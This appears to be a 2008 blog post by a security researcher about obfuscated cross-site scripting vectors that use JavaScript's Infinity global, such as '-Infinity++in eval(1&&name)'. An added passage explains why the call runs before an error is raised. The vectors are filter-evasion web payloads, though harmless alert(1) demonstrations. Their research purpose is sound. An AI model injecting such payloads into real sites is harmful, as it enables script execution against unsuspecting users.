To infinity and beyond!
Wednesday, 1 October 2008
I’m still heavily researching JavaScript in search of XSS vectors and interesting syntax. I’ve found loads of cool stuff recently, and while looking through the ECMA spec I came across the Infinity object, which is a global and a number. Of course I was already aware of it, but I wondered what kind of interesting code could be constructed with it.
It turns out quite a lot. Here’s a window.name vector; I’ve added the variable name to simulate it and execute the code.
name = 'alert(1)'
-Infinity++in eval(1&&name)
This doesn’t look like it could work, but it does:
+Infinity++in+alert(1)
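Why both expressions above still execute the call even though each ends in a runtime error, as an added example that is not part of the original post: the operands of `in` are evaluated left to right before the operator checks that its right-hand side is an object. The helper `trace` and the recording stub passed in place of `alert` are assumptions made for the illustration, and the expressions are evaluated with `new Function` so the block runs in Node.

```javascript
// Added illustration (not from the original post): run the post's first two
// expressions with a recording stub in place of alert.
// trace() and the stub are hypothetical helpers.
function trace(expr, strict) {
  const calls = [];
  const stub = (...args) => { calls.push(args); }; // stands in for alert
  // A Function body is sloppy-mode unless it carries its own directive.
  const body = (strict ? '"use strict";' : '') + 'return ' + expr + ';';
  let error = null;
  try {
    // `name` simulates window.name, as in the post.
    new Function('alert', 'name', body)(stub, 'alert(1)');
  } catch (e) {
    error = e.name;
  }
  return { calls: calls.length, error };
}

const samples = ['-Infinity++in eval(1&&name)', '+Infinity++in+alert(1)'];
for (const expr of samples) {
  // Sloppy mode: Infinity++ is a silent no-op on a read-only global, the
  // right operand runs (calling the stub), then `in` rejects a non-object.
  console.log(expr, 'sloppy', trace(expr, false));
  // Strict mode: the write to Infinity throws before the right operand runs.
  console.log(expr, 'strict', trace(expr, true));
}
```

A filter or reviewer that dismisses such input because the expression as a whole is a type error misses that the call has already run by the time the error is raised.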
And my final example combines a few different operators:
1,0000instanceof delete~void--Infinity/~alert(1)
There are endless possibilities and I’ll leave you to play.